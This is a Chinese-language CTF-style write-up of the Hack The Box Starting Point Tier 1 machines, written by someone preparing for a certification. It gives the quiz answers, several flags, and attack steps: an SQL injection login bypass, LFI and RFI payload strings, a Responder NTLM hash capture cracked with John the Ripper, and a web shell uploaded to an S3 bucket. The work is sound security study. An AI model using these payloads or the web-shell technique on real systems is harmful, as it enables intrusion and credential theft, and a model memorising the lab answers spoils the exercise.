2022年Hack the box:Tier1免费区全解
准备考CISP-PTE了,顺带把之前HTB没刷完的starting point一并刷完
Appointment
上来先扫一下,80进入
1.What does the acronym SQL stand for?
Structured Query Language
2.What is one of the most common type of SQL vulnerabilities?
sql injection
3.What does PII stand for?
Personally identifiable information
没听说过
4.What does the OWASP Top 10 list name the classification for this vulnerability?
A03:2021-Injection
5.What service and version are running on port 80 of the target?
Apache httpd 2.4.38 ((Debian))
6.What is the standard port used for the HTTPS protocol?
443
7.What is one luck-based method of exploiting login pages?
brute-forcing
这个答案就很让人无语,但细想一下,确实是lucky base
8.What is a folder called in web-application terminology?
directory
不懂了 directory不就是folder嘛
9.What response code is given for “Not Found” errors?
404
10.What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?
dir
11.What symbol do we use to comment out parts of the code?
1 | # |
登陆那一栏,登入名存在sql注入,密码随便填
1 | admin ‘# |
flag{e3d0796d002a446c0e622226f42e9672}
Sequel
1.What does the acronym SQL stand for?
首字母缩写词 SQL 代表什么?
答案:Structured Query Language
2.During our scan, which port running mysql do we find?
在我们的扫描过程中,我们找到了哪个运行 mysql 的端口?
答案:3306
TASK 3
What community-developed MySQL version is the target running?
目标运行的是哪个社区开发的 MySQL 版本?
答案:MariaDB
TASK 4
What switch do we need to use in order to specify a login username for the MySQL service?
我们需要使用什么命令来指定 MySQL 服务的登录用户名?
答案:-u
TASK 5
Which username allows us to log into MariaDB without providing a password?
哪个用户名允许我们在不提供密码的情况下登录 MariaDB?
答案:root
TASK 6
What symbol can we use to specify within the query that we want to display eveything inside a table?
我们可以使用什么符号在查询中指定要在表中显示所有内容?
答案:*
TASK 7
What symbol do we need to end each query with?
我们需要用什么符号来结束每个查询?
答案:;
数据库连上:
1 | mysql -h 10.129.131.87 -u root -P 3306 |
sql语句用的不太熟,还是把笔记翻出来才想起来的
flag{7b4bec00d1a39e3dd4e021ec3d915da8}
Crocodile
照例先扫端口
TASK 1
What nmap scanning switch employs the use of default scripts during a scan?
什么 nmap 扫描开关在扫描期间使用默认脚本?
答案:-sC
TASK 2
What service version is found to be running on port 21?
发现什么服务版本在端口 21 上运行?
答案:vsftpd 3.0.3
TASK 3
What FTP code is returned to us for the “Anonymous FTP login allowed” message?
“允许匿名 FTP 登录”消息返回给我们的 FTP 代码是什么?
答案:230
TASK 4
What command can we use to download the files we find on the FTP server?
我们可以使用什么命令来下载我们在 FTP 服务器上找到的文件?
答案:get
TASK 5
What is one of the higher-privilege sounding usernames in the list we retrieved?
我们检索到的列表中听起来更高权限的用户名之一是什么?
答案:admin
TASK 6
What version of Apache HTTP Server is running on the target host?
目标主机上运行的是什么版本的 Apache HTTP Server?
答案:2.4.41
TASK 7
What is the name of a handy web site analysis plug-in we can install in our browser?
我们可以在浏览器中安装的方便的网站分析插件的名称是什么?
答案:wappalyzer
TASK 8
What switch can we use with gobuster to specify we are looking for specific filetypes?
我们可以在 gobuster 中使用什么开关来指定我们正在寻找特定的文件类型?
答案:-x
TASK 9
What file have we found that can provide us a foothold on the target?
我们发现了哪些文件可以为我们在目标上提供立足点?
答案:login.php
从22端口上去,拿下admin用户名与密码,用御剑扫出login.php,从login.php登入就可以拿下这道题
Responder
1.When visiting the web service using the IP address, what is the domain that we are being redirected to?
直接访问IP,会跳转unika.htb
时候就要绑定host
2.Which scripting language is being used on the server to generate webpages?
php
3.What is the name of the URL parameter which is used to load different language versions of the webpage?
page
4.Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
问本地文件包含
当然是 ../../../../../../../../windows/system32/drivers/etc/hosts
5.Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
文件远程包含
//10.10.14.6/somefile
- What does NTLM stand for?
New Technology Lan Manager
Which flag do we use in the Responder utility to specify the network interface?
-I
responder是用于smb攻击的软件,浏览器通过page远程包含,访问我们tun0网卡,就可以拿到可以被用来爆破的hash
1 | sudo responder -I tun0 |
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as
john, but the full name is what?.John the Ripper
What is the password for the administrator user?
badminton
We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
开始居然没有扫出来,只能假装不知道,再手动扫一下
注意,flag不在adminstartor,而是在Mike下面,进去之后记得手动切换
Three
How many TCP ports are open?
2
What is the domain of the email address provided in the “Contact” section of the website?
mail@thetoppers.htb
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hostsWhich sub-domain is discovered during further enumeration?
用御剑或gobuster爆破,得到s3
5.Which service is running on the discovered sub-domain?
amazon s3
6.Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli
7.Which command is used to set up the AWS CLI installation?
aws configure
8.What is the command used by the above utility to list all of the S3 buckets?
1 | aws s3 ls |
9.This server is configured to run files written in what web scripting language?
php
使用aws configure里面所有内容填qwe就能过
1 | aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb |
把写好的马传上去
1 | aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb |
蚁剑连上去,美滋滋
flag就在上一层
